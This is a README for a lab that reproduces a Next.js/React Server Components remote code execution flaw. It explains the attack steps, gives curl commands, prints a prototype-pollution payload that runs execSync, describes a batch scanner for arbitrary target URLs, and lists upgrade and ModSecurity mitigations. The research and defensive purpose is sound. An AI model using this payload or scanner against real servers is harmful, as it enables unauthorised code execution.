## https://sploitus.com/exploit?id=CC460830-412E-5C27-A749-74AED133BC40
# CVE-2025-55182 / CVE-2025-66478 Vulnerability Replay Environment
This is a minimal MVP environment for reproducing the React2Shell (CVE-2025-55182) and Next.js RSC RCE (CVE-2025-66478) vulnerabilities. ## โ ๏ธ Warning
**This project is intended only for security research and educational purposes. Do not use it in production environments or unauthorized systems.**
## Vulnerability Overview
CVE-2025-55182 is a serious vulnerability in React Server Components, affecting:
- **React**: 19.0.0, 19.1.0, 19.1.1, 19.2.0
- **Next.js**: โฅ14.3.0-canary.77, โฅ15, โฅ16
An attacker can exploit the deserialization vulnerability of Flight Protocol through a specially crafted `multipart/form-data` request, achieving remote code execution (RCE). ### Attack Mechanism
1. **Obtaining Chunk References**: Using the `$@N` syntax to obtain internal Chunk objects.
2. **Prototype Chain Pollution**: Injecting malicious `then` methods through `$1:__proto__:then`.
3. **Triggering Execution**: The Server Action calls the polluted `then` method during `await`.
4. **Constructor Hijacking**: Hijacking `_formData.get` to a Function constructor.
5. **Code Execution**: Executing arbitrary code via Blob deserialization.
## Quick Start
### 1. Install Dependencies
```bash
npm install
# Or
yarn install
# Or
pnpm install
```
### 2. Start Development Server
```bash
npm run dev
```
The server will start at `http://localhost:3000`. ### 3. Test Vulnerabilities
Use the provided test scripts:
```bash
# Single target test
./test-exploit.sh http://localhost:3000
# Or directly with curl
curl -X POST http://localhost:3000/ \
-H "Next-Action: x" \
-H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
--data-binary @exploit-payload.txt
```
If the vulnerability exists, you will see an output like `uid=` in the response (the result of executing the `id` command). ## File Structure
```
. โโโ app/
โ โโโ actions.ts # Server Actions (vulnerability trigger point)
โ โโโ page.tsx # Main page
โ โโโ layout.tsx # Layout
โ โโโ globals.css # Global styles
โโโ package.json # Dependency configuration (using affected versions)
โโโ next.config.js # Next.js configuration
โโโ test-exploit.sh # Single target vulnerability test script
โโโ scan-targets.sh # Batch scanning script
โโโ exploit-payload.txt # Exploit payload file
โโโ Cve-2025-55182-modsecurity-rules.conf # ModSecurity protection rules
โโโ README.md # Readme file
```
## Test Script Instructions
### 1. test-exploit.sh - Single Target Test
Test whether a single URL has a vulnerability:
```bash
chmod +x test-exploit.sh
./test-exploit.sh http://localhost:3000
```
**Feature**: If the response contains `uid=` or `gid=`, the vulnerability exists. ### 2. scan-targets.sh - Batch Scanning
Batch scan multiple target URLs:
```bash
# Create a list of targets
cat > targets.txt << EOF
http://localhost:3000
https://example.com
https://api.example.com:8080
EOF
# Execute batch scanning
chmod +x scan-targets.sh
./scan-targets.sh targets.txt
```
The scan results will be saved to `vulnerable_hosts.csv`. ## Payload Structure Analysis
```json
{
"then": "$1:__proto__:then", // Hijack the `then` method
"status": "resolved_model", // Control the execution path
"reason": -1,
"value": "{\"then\":\"$B1337\"}", // Trigger Blob deserialization
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor" // Hijack as a Function
}
}
}
```
### Key Points:
1. **$@0**: References the first `form-data` field, obtaining the Chunk object.
2. **$1:__proto__:then**: Accessing Chunk.prototype.then
3. **_response._prefix**: Injected malicious code (will be executed by the Function constructor)
4. **$1:constructor:constructor**: Object.constructor.constructor = Function
## Fix Solutions
### Solution 1: Upgrade to a fixed version (recommended)
- **React**: 19.0.1, 19.1.2, 19.2.1 or higher
- **Next.js**: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7 or higher
```bash
npm install react@19.0.1 react-dom@19.0.1 next@15.0.5
```
### Solution 2: Deploy ModSecurity WAF rules (temporary mitigation)
If an immediate upgrade is not possible, you can deploy ModSecurity rules for temporary protection.
#### Apache + mod_security
```bash
# 1. Install mod_security
sudo apt-get install libapache2-mod-security2
# 2. Copy the rule file
sudo cp modsecurity-rules.conf /etc/modsecurity/
# 3. Add the rules to Apache configuration
sudo vim /etc/apache2/mods-enabled/security2.conf
# Add: Include /etc/modsecurity/modsecurity-rules.conf
# 4. Restart Apache
sudo systemctl restart apache2
```
#### Nginx + ModSecurity
```bash
# 1. Install ModSecurity for Nginx
sudo apt-get install libnginx-mod-security
# 2. Copy the rule file
sudo cp modsecurity-rules.conf /etc/nginx/modsec/
# 3. Enable the rules in Nginx configuration
sudo vim /etc/nginx/nginx.conf
# Add the following to the http or server block:
# modsecurity on;
# modsecurity_rules_file /etc/nginx/modsec/modsecurity-rules.conf;
# 4. Restart Nginx
sudo systemctl restart nginx
```
#### Rules Detection Features
ModSecurity rules detect the following features:
- โ Flight Protocol features (`$@N`, `$BN`)
- โ Prototype chain contamination (`__proto__`, `constructor:constructor`)
- โ Dangerous Node.js module calls (`process.mainModule.require`, `require('child_process')`)
- โ Command execution functions (`execSync`, `exec`)
- โ Internal object operations (`_response`, `_chunks`, `_formData`, `_prefix`)
- โ Server Action request headers (`Next-Action`, `RSC-Action-ID`)
**โ ๏ธ Note**: WAF rules are only a temporary solution; a full protection requires upgrading to a fixed version.
## Security Recommendations
If your application may be affected:
1. **Test immediately**: Use the `test-exploit.sh` script to test your application.
2. **Upgrade immediately**: Update to a fixed version.
3. **Rotate keys**: Rotate all environment variables, API keys, and database passwords.
4. **Audit logs**: Check access logs for suspicious `Next-Action` requests.
5. **Deploy WAF**: Deploy ModSecurity rules as a temporary protection before upgrading.
## Quick Test with curl Command
If you want to test directly using curl (without a script):
```bash
curl -X POST http://localhost:3000/ \
-H "Next-Action: x" \
-H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
-H "X-Nextjs-Request-Id: b5dce965" \
--data-binary @exploit-payload.txt
```
If the result includes `uid=` or `gid=`, it indicates a vulnerability exists.
## References
- [Vercel Official Bulletin](https://vercel.com/changelog/cve-2025-55182)
- [React GHSA](https://github.com/facebook/react/security/advisories)
- [Next.js GHSA](https://github.com/vercel/next.js/security/advisories)
- [CVE PoC (React)](https://github.com/hzhsec/cve_2025_55182_test)
- [CVE Scanner (Next.js)](https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478)
- [ModSecurity Documentation](https://github.com/SpiderLabs/ModSecurity)
## Thanks
- Lachlan Davidson โ Identified and responsibly reported this vulnerability.
- Meta Security & React Team
- Vercel Team
## License
This project is intended for educational purposes only. Please comply with relevant laws when using this code.
[source-iocs-preserved url=http://localhost:3000`]